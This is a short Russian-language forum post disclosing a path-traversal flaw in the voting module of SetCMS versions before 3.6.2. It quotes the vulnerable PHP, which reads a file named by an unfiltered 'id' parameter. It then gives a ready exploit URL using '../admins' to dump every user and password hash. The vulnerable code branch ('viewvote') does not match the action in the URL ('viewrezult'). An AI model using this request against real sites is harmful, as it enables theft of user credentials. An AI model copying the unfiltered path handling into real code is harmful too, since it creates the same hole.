Как я и говорил кое что более интересое чем xss Во всех версиях SetCMS до 3.6.2 обнаружена критическая уязвимость возможно получение всех паролей пользователей через модуль голосования \modules\golos\index.php ошибка в нефильтруемой переменной id PHP: if ($mc == "viewvote" && isset($_GET['id'])) { $votenum = $_GET['id']; $file = file("files/polls/$votenum.set"); таким образом, составив такой запрос Code: http://target.com/SetCMS/index.php?set=golos&mc=viewrezult&id=../admins мы получим список всех пользователей и их хэши. (с) madnet
